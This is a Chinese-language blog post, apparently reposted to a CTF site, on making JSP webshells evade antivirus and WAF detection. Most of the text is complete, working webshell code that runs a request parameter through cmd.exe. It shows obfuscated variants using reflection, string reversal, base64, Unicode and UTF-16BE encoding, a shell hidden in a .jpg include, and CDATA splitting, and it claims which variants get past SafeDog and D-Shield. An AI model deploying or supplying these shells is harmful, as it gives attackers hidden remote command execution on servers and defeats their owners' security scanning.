Jsp Webshell 免杀-命令执行

渗透技巧 3年前 (2022) admin
1,149 0 0

Jsp Webshell 免杀-命令执行

前言

php的一句话木马即可以直接命令执行又可以作为冰蝎、蚁剑的客户端,而java就显得比较复杂。在经过java基础学习之后,尝试对java命令执行的webshell进行免杀处理。

命令执行

在之前的 Java 命令执行[1] 中学习了执行系统命令的几个类。这次我们还是以经典的Runtime类来测试。

<%@ page language="java" contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"%><%@ page import="java.io.*"%><%out.print(System.getProperty("os.name").toLowerCase());String  cmd = request.getParameter("cmd");if(cmd != null){    Process p =  Runtime.getRuntime().exec(new String[]{"cmd.exe","/c",cmd});    InputStream input = p.getInputStream();    InputStreamReader ins = new InputStreamReader(input, "GBK");    BufferedReader br = new BufferedReader(ins);    out.print("<pre>");    String line;    while((line = br.readLine()) != null) {        out.println(line);    }    out.print("</pre>");    br.close();    ins.close();    input.close();    p.getOutputStream().close();}%>

该文件有着明显的exec危险代码。

Jsp Webshell 免杀-命令执行

反射

利用反射来免杀webshell是常用技术之一。反射的编写过程参考Java 反射机制学习[2]

<%@ page language="java" contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"%><%@ page import="java.io.*"%><%@ page import="java.lang.reflect.Constructor" %><%@ page import="java.lang.reflect.Method" %><%    out.print(System.getProperty("os.name").toLowerCase());    String  cmd = request.getParameter("cmd");    if(cmd != null){        Class clazz = Class.forName("java.lang.Runtime");        Constructor declaredConstructor = clazz.getDeclaredConstructor();        declaredConstructor.setAccessible(true);        Object o = declaredConstructor.newInstance();        Method show = clazz.getDeclaredMethod("exec", String[].class);        String[] cmds = new String[]{"cmd.exe","/c",cmd};        Object invoke = show.invoke(o,(Object)cmds);        Process p = (Process) invoke;        InputStream input = p.getInputStream();        InputStreamReader ins = new InputStreamReader(input, "GBK");        BufferedReader br = new BufferedReader(ins);        out.print("<pre>");        String line;        while((line = br.readLine()) != null) {            out.println(line);        }        out.print("</pre>");        br.close();        ins.close();        input.close();        p.getOutputStream().close();    }%>

还可以通过base64编码的方式将关键字符串java.lang.Runtime编码起来。

String a = new String(Base64.getDecoder().decode("amF2YS5sYW5nLlJ1bnRpbWU="));System.out.println(a);

又或者创建一个方法来反转字符串。

<%@ page language="java" contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"%><%@ page import="java.io.*"%><%@ page import="java.lang.reflect.Constructor" %><%@ page import="java.lang.reflect.Method" %><%!public static String reverseStr(String str){return new StringBuilder(str).reverse().toString();}%><%    out.print(System.getProperty("os.name").toLowerCase());    String  cmd = request.getParameter("cmd");    if(cmd != null){        Class clazz = Class.forName(reverseStr("emitnuR.gnal.avaj"));        Constructor declaredConstructor = clazz.getDeclaredConstructor();        declaredConstructor.setAccessible(true);        Object o = declaredConstructor.newInstance();        Method show = clazz.getDeclaredMethod(reverseStr("cexe"), String[].class);        String[] cmds = new String[]{"cmd.exe","/c",cmd};        Object invoke = show.invoke(o,(Object)cmds);        Process p = (Process) invoke;        InputStream input = p.getInputStream();        InputStreamReader ins = new InputStreamReader(input, "GBK");        BufferedReader br = new BufferedReader(ins);        out.print("<pre>");        String line;        while((line = br.readLine()) != null) {            out.println(line);        }        out.print("</pre>");        br.close();        ins.close();        input.close();        p.getOutputStream().close();    }%>

Jsp Webshell 免杀-命令执行

include 指令

Java Web 里有一个include指令,可以将外部文件嵌入到当前jsp语句中,并同时解析页面的jsp语句。

<%@ page language="java" contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"%><%@ page import="java.io.*"%><%@ page import="java.lang.reflect.Constructor" %><%@ page import="java.lang.reflect.Method" %><%@ include file = "1.jpg" %>

1.jpg 编写恶意代码。

<%    out.print(System.getProperty("os.name").toLowerCase());    String  cmd = request.getParameter("cmd");    if(cmd != null){        Class clazz = Class.forName("java.lang.Runtime");        Constructor declaredConstructor = clazz.getDeclaredConstructor();        declaredConstructor.setAccessible(true);        Object o = declaredConstructor.newInstance();        Method show = clazz.getDeclaredMethod("exec", String[].class);        String[] cmds = new String[]{"cmd.exe","/c",cmd};        Object invoke = show.invoke(o,(Object)cmds);        Process p = (Process) invoke;        InputStream input = p.getInputStream();        InputStreamReader ins = new InputStreamReader(input, "GBK");        BufferedReader br = new BufferedReader(ins);        out.print("<pre>");        String line;        while((line = br.readLine()) != null) {            out.println(line);        }        out.print("</pre>");        br.close();        ins.close();        input.close();        p.getOutputStream().close();    }%>

访问也是可以正常执行命令。

Jsp Webshell 免杀-命令执行

因为安全狗、D盾主要查杀Runtime.getRuntime().exec(),在使用include的情况下可以绕过D盾无法绕过安全狗。当再次利用反射机制就可以成功绕过。

Jsp Webshell 免杀-命令执行

编码

Java 程序可以自动识别Unicode编码,所以我们可以将java源代码除了page指令的代码外,全部编码。先在网上查找一个字符串与Unicode编码相互转换的类。

    public void  convert(String str) {        str = (str == null ? "" : str);        String tmp;        StringBuffer sb = new StringBuffer(1000);        char c;        int i, j;        sb.setLength(0);        for (i = 0; i < str.length(); i++) {            c = str.charAt(i);            sb.append("\u");            j = (c >>> 8); //取出高8位            tmp = Integer.toHexString(j);            if (tmp.length() == 1)                sb.append("0");            sb.append(tmp);            j = (c & 0xFF); //取出低8位            tmp = Integer.toHexString(j);            if (tmp.length() == 1)                sb.append("0");            sb.append(tmp);
} System.out.print(new String(sb)); }

再创建一个方法,通过读取文本文件的方式调用convert()方法将上面的命令执行的代码编码。

    public void test2() throws IOException {        File srcfile = new File("a.txt");        FileReader fileReader = new FileReader(srcfile);        BufferedReader bufferedReader = new BufferedReader(fileReader);        String s;        while ((s = bufferedReader.readLine()) != null) {            convert(s);            System.out.print("rn");        }    }

运行后得到Unicode编码后的代码,再把原来page指令声明上即可。

<%@ page language="java" contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"%><%@ page import="java.io.*"%>
<%u006fu0075u0074u002eu0070u0072u0069u006eu0074u0028u0053u0079u0073u0074u0065u006du002eu0067u0065u0074u0050u0072u006fu0070u0065u0072u0074u0079u0028u0022u006fu0073u002eu006eu0061u006du0065u0022u0029u002eu0074u006fu004cu006fu0077u0065u0072u0043u0061u0073u0065u0028u0029u0029u003bu0053u0074u0072u0069u006eu0067u0020u0020u0063u006du0064u0020u003du0020u0072u0065u0071u0075u0065u0073u0074u002eu0067u0065u0074u0050u0061u0072u0061u006du0065u0074u0065u0072u0028u0022u0063u006du0064u0022u0029u003bu0069u0066u0028u0063u006du0064u0020u0021u003du0020u006eu0075u006cu006cu0029u007bu0020u0020u0020u0020u0050u0072u006fu0063u0065u0073u0073u0020u0070u0020u003du0020u0020u0052u0075u006eu0074u0069u006du0065u002eu0067u0065u0074u0052u0075u006eu0074u0069u006du0065u0028u0029u002eu0065u0078u0065u0063u0028u006eu0065u0077u0020u0053u0074u0072u0069u006eu0067u005bu005du007bu0022u0063u006du0064u002eu0065u0078u0065u0022u002cu0022u002fu0063u0022u002cu0063u006du0064u007du0029u003bu0020u0020u0020u0020u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0020u0069u006eu0070u0075u0074u0020u003du0020u0070u002eu0067u0065u0074u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0028u0029u003bu0020u0020u0020u0020u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0052u0065u0061u0064u0065u0072u0020u0069u006eu0073u0020u003du0020u006eu0065u0077u0020u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0052u0065u0061u0064u0065u0072u0028u0069u006eu0070u0075u0074u002cu0020u0022u0047u0042u004bu0022u0029u003bu0020u0020u0020u0020u0042u0075u0066u0066u0065u0072u0065u0064u0052u0065u0061u0064u0065u0072u0020u0062u0072u0020u003du0020u006eu0065u0077u0020u0042u0075u0066u0066u0065u0072u0065u0064u0052u0065u0061u0064u0065u0072u0028u0069u006eu0073u0029u003bu0020u0020u0020u0020u006fu0075u0074u002eu0070u0072u0069u006eu0074u0028u0022u003cu0070u0072u0065u003eu0022u0029u003bu0020u0020u0020u0020u0053u0074u0072u0069u006eu0067u0020u006cu0069u006eu0065u003bu0020u0020u0020u0020u0077u0068u0069u006cu0065u0028u0028u006cu0069u006eu0065u0020u003du0020u0062u0072u002eu0072u0065u0061u0064u004cu0069u006eu0065u0028u0029u0029u0020u0021u003du0020u006eu0075u006cu006cu0029u0020u007bu0020u0020u0020u0020u0020u0020u0020u0020u006fu0075u0074u002eu0070u0072u0069u006eu0074u006cu006eu0028u006cu0069u006eu0065u0029u003bu0020u0020u0020u0020u007du0020u0020u0020u0020u006fu0075u0074u002eu0070u0072u0069u006eu0074u0028u0022u003cu002fu0070u0072u0065u003eu0022u0029u003bu0020u0020u0020u0020u0062u0072u002eu0063u006cu006fu0073u0065u0028u0029u003bu0020u0020u0020u0020u0069u006eu0073u002eu0063u006cu006fu0073u0065u0028u0029u003bu0020u0020u0020u0020u0069u006eu0070u0075u0074u002eu0063u006cu006fu0073u0065u0028u0029u003bu0020u0020u0020u0020u0070u002eu0067u0065u0074u004fu0075u0074u0070u0075u0074u0053u0074u0072u0065u0061u006du0028u0029u002eu0063u006cu006fu0073u0065u0028u0029u003bu007d%>

Jsp Webshell 免杀-命令执行

D盾依然可以查杀,安全狗顺利绕过。那么Unicode 编码还能怎么处理呢?Unicode编码的关键点在于以’u’开头表明和unicode编码相关。可以将’u’重复声明,即’uuuuuuu’

<%out.println("uuuuuu006fuuuuuuuuuuuuuuuuuu0075uuu0074");%>

将上面代码稍做调整

sb.append("\uuuuu");

再次生成webshell,可成功绕过D盾。

Jsp Webshell 免杀-命令执行

java 同样支持其他编码格式

import chardetimport codecs
filename_in = 'webshell.txt'filename_out = 'utf-16be_es.jsp'
with codecs.open(filename=filename_in, mode='r', encoding='utf-8') as fi: data = fi.read() with open(filename_out, mode='w') as fo: fo.write('<%@ page contentType="charset=utf-16be" %>') fo.write(data.encode('utf-16be')) fo.close()

如 utf-16be 编码方式

Jsp Webshell 免杀-命令执行

扩展

在绕过某些WAF时,WAF可能会检测jsp标签、客户端传入的参数以及威胁命令。对应jsp标签<%%>,可以使用<jsp:scriptlet></jsp:scriptlet>代替。且不需要import导入,定义完整的类名。

<jsp:scriptlet>    out.print(System.getProperty("os.name").toLowerCase());    String  cmd = request.getParameter("cmd");    if(cmd != null){        Class clazz = Class.forName("java.lang.Runtime");        java.lang.reflect.Constructor declaredConstructor = clazz.getDeclaredConstructor();        declaredConstructor.setAccessible(true);        Object o = declaredConstructor.newInstance();        java.lang.reflect.Method show = clazz.getDeclaredMethod("exec", String[].class);        String[] cmds = new String[]{"cmd.exe","/c",cmd};        Object invoke = show.invoke(o,(Object)cmds);        Process p = (Process) invoke;        java.io.InputStream input = p.getInputStream();        java.io.InputStreamReader ins = new java.io.InputStreamReader(input, "GBK");        java.io.BufferedReader br = new java.io.BufferedReader(ins);        String line;        while((line = br.readLine()) != null) {            out.println(line);        }        br.close();        ins.close();        input.close();        p.getOutputStream().close();    }</jsp:scriptlet>

对于参数先将其存储进会话然后调用。

request.setAttribute("a",request.getParameter("cmd"));String cmd = request.getAttribute("a").toString();

如果检测威胁命令可以对其进行编码,这里选择ASCII编码进行测试。对应服务端代码该为:

String decode = java.net.URLDecoder.decode(cmd.replaceAll("\\x", "%"), "utf-8");String[] cmds = new String[]{"cmd.exe","/c",decode};

此时既可以输入whoami,也可以输入十六进制编码后的%5c%78%37%37%5c%78%36%38%5c%78%36%66%5c%78%36%31%5c%78%36%64%5c%78%36%39

Jsp Webshell 免杀-命令执行

或者base64编码加反转等等都可以。

<%@ page language="java" contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"%><%@ page import="java.io.*"%><%@ page import="java.util.Base64" %><%@ page import="java.lang.reflect.Constructor" %><%@ page import="java.lang.reflect.Method" %><%!public static String reverseStr(String str){return new StringBuilder(str).reverse().toString();}%><%    out.print(System.getProperty("os.name").toLowerCase());    String  bs64 = request.getParameter("cmd");    if(bs64 != null){        String cmd = new String(Base64.getDecoder().decode(reverseStr(bs64)),"UTF-8");        Class clazz = Class.forName("java.lang.Runtime");        Constructor declaredConstructor = clazz.getDeclaredConstructor();        declaredConstructor.setAccessible(true);        Object o = declaredConstructor.newInstance();        Method show = clazz.getDeclaredMethod("exec", String[].class);        String[] cmds = new String[]{"cmd.exe","/c",cmd};        Object invoke = show.invoke(o,(Object)cmds);        Process p = (Process) invoke;        InputStream input = p.getInputStream();        InputStreamReader ins = new InputStreamReader(input, "GBK");        BufferedReader br = new BufferedReader(ins);        out.print("<pre>");        String line;        while((line = br.readLine()) != null) {            out.println(line);        }        out.print("</pre>");        br.close();        ins.close();        input.close();        p.getOutputStream().close();    }%>

对应客户端传入的命令也就是base64编码后反转的字符串。

Jsp Webshell 免杀-命令执行

CDATA特性

被<![CDATA[]]>这个标记所包含的内容将表示为纯文本,java 同样支持该特性。

<?xml version="1.0" encoding="UTF-8"?><jsp:root xmlns:jsp="http://java.sun.com/JSP/Page"  version="1.2"><jsp:directive.page contentType="text/html"/><jsp:declaration></jsp:declaration><jsp:scriptlet><![CDATA[o]]>u<![CDATA[t.writ]]><![CDATA[e]]>("123!");out.print(System.getProperty("os.name").toLowerCase());String  cmd = <![CDATA[re]]>q<![CDATA[uest.getPar]]><![CDATA[ameter]]>("cmd");    if(cmd != null){        Class clazz = Class.forName("java.lang.Runtime");        java.lang.reflect.Constructor declaredConstructor = clazz.getDeclaredConstructor();        declaredConstructor.setAccessible(true);        Object o = declaredConstructor.newInstance();        java.lang.reflect.Method show = <![CDATA[cla]]>z<![CDATA[z.getDec]]><![CDATA[laredMethod]]>("exec", String[].class);        String[] cmds = new String[]{"cmd.exe","/c",cmd};        Object invoke = show.invoke(o,(Object)cmds);        Process p = (Process) invoke;        java.io.InputStream input = p.getInputStream();        java.io.InputStreamReader ins = new java.io.InputStreamReader(input, "GBK");        java.io.BufferedReader br = new java.io.BufferedReader(ins);        String line;        while((line = br.readLine()) != null) {            out.println(line);        }        br.close();        ins.close();        input.close();        p.getOutputStream().close();    }</jsp:scriptlet><jsp:text></jsp:text></jsp:root>

总结

本文免杀的方式主要利用的知识点是反射和编码,可以达到简单免杀的效果。算是一个学习的切入口。在实际更为复杂的情况下,还要继续学习以类加载器等更多方式进行免杀处理。

References

[1] Java 命令执行: https://www.jianshu.com/p/05ea5142b2a4
[2] Java 反射机制学习: https://www.jianshu.com/p/0a92aa558bc3


Jsp Webshell 免杀-命令执行


原文始发于微信公众号(Wings安全团队):Jsp Webshell 免杀-命令执行

版权声明:admin 发表于 2022年3月10日 下午4:35。
转载请注明:Jsp Webshell 免杀-命令执行 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...